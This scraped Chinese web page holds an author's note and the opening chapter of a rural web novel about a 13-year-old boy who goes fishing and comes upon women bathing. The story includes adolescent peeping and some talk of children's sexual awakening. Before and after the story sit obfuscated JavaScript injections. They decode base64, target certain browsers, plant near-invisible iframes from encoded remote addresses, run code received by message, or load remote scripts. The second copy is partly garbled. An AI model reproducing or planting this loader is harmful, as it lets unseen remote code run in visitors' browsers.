羽毛瘙痒play男_男同 men at play

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
不好意思了,各位书友大大们,第596章章节名弄错了,但内容是紧跟着前一章,并没有错,请大家放心订阅就是。等编辑上班,我会请求他帮忙改回来。恳请大家能理解一下,再次拜谢!

另外,再推荐一下好友新书:

书名:《文艺男神快崛起》;

简介:冯只是个普通农村孩子,他做梦都没想到,有朝一日自己会变成全世界女人心目艺男神。

本书不重生不穿越不玩抄袭,只想用原创虔诚玩一把文艺男神养成!

第一章试读:

第1章逮鱼

五黄六月,焦麦炸豆。

199年6月4日,中午1点多钟,正是一天中最热时候。冯和几个小伙伴走在通往村边小河乡村土路上。

每个人都是一身汗,就跟刚从水里捞出来一样。

汗水噗噗落在地上,腾起一股股烟气,瞬间就被蒸干。

毒辣辣太阳炙烤大地,天气已经热得蒸笼一样,农民们却祷告上天:这样晴天可以多持续一段时间。

举目望去,广袤田野上,麦子已经收了一多半。农人们挥汗如雨在地里忙碌着,有挥镰收割,有正赶着驴车或开着机动三轮装麦子往打麦场运输。

就连三四岁小孩子都胳膊上挎个大篮子脚步蹒跚,跟个小鸭子似在地里捡麦子。

六七岁大点孩子,有比镰刀高不了多少,也成了割麦主力军。

这时,在位于中原腹地南河省农村,收割机还是个稀罕物,种地主要靠人力。

收麦如救火,那是一刻也耽误不得。焦黄一地麦子,如果不及时收回家,刮场大风或下场暴雨,一季收成就全泡了汤。

所以,在麦熟日子,一切要紧事都得为收麦让路,村人忙起来那可真是没日没夜。如此要繁忙十五天左右,收麦才会告一段落。

农村孩子不放暑假,却会放二十天左右收麦假。

同样,他们在秋天时也会有一个多月秋假,用于收秋种麦。

冯今年13岁,就读冯庄乡初中一年级。

他年纪不大,身高却已有一米七三,身材颀长,眉目清秀,皮肤黝黑,看上去很是壮硕,一身腱子肉都是跟家里干农活锻炼出来。

农村孩子,13岁能长到他这个头,在这个时候也是极罕见。

所以,冯走到哪里还都挺受人关注。

冯是家里独子,上头有三个姐姐。爹娘视其为掌中宝,疼爱有加,什么活都舍不得他干。

可他是个懂事孩子。

打小就懂事。

虽然上头有三个姐,不缺他这个劳力,但他还是从五六岁就开始帮家里干活。平日里拾柴禾放羊积肥薅草,帮家里做饭,农忙时候割麦摘棉花收玉米出花生,他都抢着干。

有村民笑着夸他:这小子长大了准是一个好庄稼把式。

只是,令人惋惜是,他不够聪明,在学校读书,学习也很勤奋,就是学不会,成绩只能是中不溜样子。

就这成绩,能上个初中毕业就不错了。

事实上,前冯庄整个村子三千六百多口人,大多数孩子也都是只读个小学毕业或者初中毕业就辍学回家务农了。

父母对冯学习不好并不感到忧虑,他们觉得这挺正常。

就这一个儿子,真要考上大学去了大城市,那才会让他们感到惶恐呢。

还是让孩子就读个初中毕业,便回家娶妻生子传承家业,才是最妥当安排。

现在农村,早婚现象十分严重。

少年男女十二三便订婚,十五六就结婚事件时有生,若是一个男孩子到了二十岁还没定亲,爹娘就会心急如焚,担心儿子会娶不上媳妇。

前两天,村里媒婆子七斤婶还给冯说了中冯庄一个16岁女孩。冯在母亲带领下去见了一回,这女长得膀大腰圆一脸横肉,从外表看,怎么也不像16,倒像是三十多妇人。

媒婆子还蛊惑冯娘,说甚么妻大三抱金砖,这对象长得壮好生养,干活也是一把好手,那是打着灯笼都找不着好儿媳,有好几家都争着下聘呢。媒婆让冯娘抓紧时间定下来,只需要给女方一千块钱彩礼,就算是定下亲事,过个两三年,一成亲,就可以等着抱胖孙子了。

娘被说得动心,就和冯打商量,问他要不要给他定下这个媳妇。

冯坚决拒绝掉了。

拒绝原因只是因为他觉得这女太丑,不符合自己内心审美标准,跟这么丑女人同床共枕一辈子,那活着简直就是一种煎熬。

冯自己心里已经有了一个女孩朦胧婀娜身影。她是中冯庄村长张有车女儿张丽香。张丽香跟冯是同学,也是班里学习尖子,一直占据着乡中初中一年级第一名位置。

她早早就放出话来,不打算考中专,要上高中考大学!

张丽香在冯庄乡中很出名,不止是她学习好,还因为她生得美。

乡下人词儿少,不知道该如何形容张丽香美。

说到张丽香,大多人都会用到这些词:个儿高,身条好,脸盘儿顺,像个城里女人。

这个时候,城乡差距相当大,说一个乡下姑娘像城里人,那是夸她洋气美丽最顶级好词。

暗恋张丽香男孩,绝不止冯一个。

但所有男孩,在她面前都有些自惭形秽。

大家都说,张丽香不像个农村人,而她也终究不会永远留在农村,她于冯庄,不过是过客一样。

总有那么一天,她会展翅高飞,栖身于高楼大厦大都会。

每每想到这里,冯就很伤感。

冯和几个小伙伴走在去村边小河路上。

他们是要去捉鱼。

绕着整个大冯庄,有一条灌溉渠。早年间据说是冯庄寨墙护城河。这条河河水是引自黄河。

199年雨水大,黄河水量剧增,防汛压力大,于是就开始往泄洪渠里泄洪。

这也导致了村边河里水流爆满,甚至淹没了村边好几处低洼,形成了好几片小湖。

有水就有鱼。

这一年冯庄河里所多便是泥鳅。

只需要用一块两三米见方窗纱两个人拉扯着在河里趟上那么几遭,每一网出水,都能捞上来十多条手指头粗细一扎多长泥鳅。

将这些泥鳅剪掉头,开肠破肚取出内脏,和面搅匀了放到油锅里炸一炸,焦黄嫩香,好吃得很。

第一次吃炸泥鳅,冯看见被剪掉了头,去了内脏泥鳅还在面里扭着身子活蹦乱跳,他一阵阵反胃,恶心坏了。

鱼炸好了,他死活不吃。

因为他脑子里还满满都是泥鳅们在血泊中扭动蛇一样身子情形。

不过,他到底没能禁住香味诱惑,最后还是尝了一条。

然后,他就喜欢上了这种人间美味。

麦假这些天里,他几乎每天都要找几个村里小伙伴,到河水里捞泥鳅。

顺便还能洗个澡去去暑气,也算一举两得。

那边似乎有情况。一个小黑胖子忽然指着前方河道说。

小黑胖子叫张征,跟冯一个班,他甚至还比冯大几个月,不过,个子才不到一米六,横向展趋势严重。

嘿嘿!好像是有几个女在洗澡啊,身子白花花,隔这么远都能看见,啧啧啧!一个光头小子,两眼放光,吞着口水奸笑。

这光头小子叫冯坤平,也是村里大人们头疼一个捣蛋娃娃。

十三四孩子,已经通了男女之事。

别以为农村人封建保守,开窍得晚。

其实,因为早年间农村房子都是大开间,一家人往往就住一座房,甚至孩子都七八十来岁了还跟父母同床,年轻父母兴致起来了,折腾得昏天黑地,浑不知自己行为已经被旁边孩子看得个一清二楚。

加上孩子上小学之前,到了夏天时候,大人为了省事儿少洗几件脏衣服,往往是给孩子扒个精光,任他们四处跑着玩,满村都是光屁股小孩,男女都有,男女身体结构迥然不同一目了然。

农村孩子受性启蒙有很多时候反倒很早。

就如同现在,几个十三四半大男孩他们本来是来河里逮鱼来着,看见前面河里有女人洗澡就两眼放光,忘了正事儿了。

她们倒是好大胆,大白天就敢下河洗澡。冯很是感到奇怪。一般情况下,村里女人都是晚上趁着夜色去河里洗身子。那样子走光危险会小一点。

事实上,每到了夏天溽热难耐时候,每天晚上女人们也会成群结队去河里洗澡,她们占据一段地势最好河流,大大方方下水洗浴嬉戏。男人则在距离女人远一点地方下河解暑。大家互不干涉。

天太热了呗,刚干完活热得要死,肯定是下河洗个澡舒服些,我们悄悄摸过去看看,怎样?冯坤平提议。

被逮到就麻烦了,会被骂死。张征有些胆怯。

冯却是已经看到了从一颗梧桐树后转出来站岗放哨张丽香:冯,你们想干嘛?

张丽香戴着个镶花边草帽,一张俏生生小脸满是警惕,对几个男孩丝毫不假颜色。

她出现,吓了几个男孩一跳。

冯赶忙解释:张丽香,我们过来河里逮鱼,不知道这里有女洗澡。

哟!这不是张丽香吗?这么热天,你怎么不下水呀?看你,汗都把衣服湿透了。冯坤平却是毫不畏怯地跟张丽香打趣。

张丽香不理冯坤平,只是看着冯:冯,你们去别处逮鱼吧,我妈她们几个正在水里洗身子。

冯挠挠头:好,我们这就走。

张征憨笑着点头附和:对,我们这就去别处。

冯坤平涎着一张脸还想墨迹:张丽香,你也去下河洗澡吧,我替你们站岗放哨,绝不放任何一个人过去偷看,行不?

走吧!别丢人现眼了。冯一把拉住他胳膊,扯了就走。

几个男孩恋恋不舍,频频回头,向着另一段水域走去。

女人白白身子,这时候对他们是极大诱惑。他们非常渴望仔细研究一下这些跟自己不太一样异性。

可惜,除了偷窥,并没别机会。

那几个女人洗澡地方,正是小河最浅处,适合下到水里拉网逮鱼。冯几个人走了一段路,来到一处河湾水面较宽地方停下。

这儿已经距离女人们洗澡处约3多米。

几个男孩全都脱得溜光。

大呼小叫着下了水。

六月天,外面很热,但水里却是极凉,温差怎么也有十来度。所以,刚一下水还真有些受不了。

这一段河,河水深度足有一米五,就是冯这样个子,进去站在河底,也只能露出个脑袋来。

因此,想要在这样深水里用网逮鱼,并不怎么容易。

几个人试了几网,一条泥鳅都没逮到。

冯看看不远处那座小桥,说:不如我们过去小桥那里,用这张网封住桥洞,试几网怎样?

那座小桥是座单孔拱桥,桥洞直径不过一米多,那里河也窄些,很适合拉一张网拦在桥洞前逮鱼。

不好一点是,那里水流湍急,不容易站稳身子。

我看可以。张征说。

那就游过去下网好了。冯坤平道。

几个人就往小桥游过去。

很快,他们就到了地。

由冯和冯坤平扯着网两端下网,张征和另外一个孩子则在旁边等着从网里往桶中捡鱼。

冯扯着渔网一端在河底淤泥中站稳,他很快就感受到了湍急水流冲击,脚下直打滑。而水流冲击着渔网,几乎要将渔网冲跑了,冲击力之大,也是过了他们此前想象。

毕竟窗纱太过细密,对水流阻力也大。

我靠!不行了,我站不住了。冯坤平大叫一声,身子一歪,便倒在了水里。

噗通!

噗通!

河中溅起两朵硕大水花。

冯坤平也带着本就摇摇欲坠冯一跤跌进水中。

冯赶忙想要从水底钻出来。

就在这个时候,他骤然觉到脑袋上就如被什么东西叮咬了一口,一阵剧痛,与此同时,他脑中也是轰一声,就如有什么东西进入到他脑袋里炸开了一般,他眼前一黑,就昏死了过去。
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}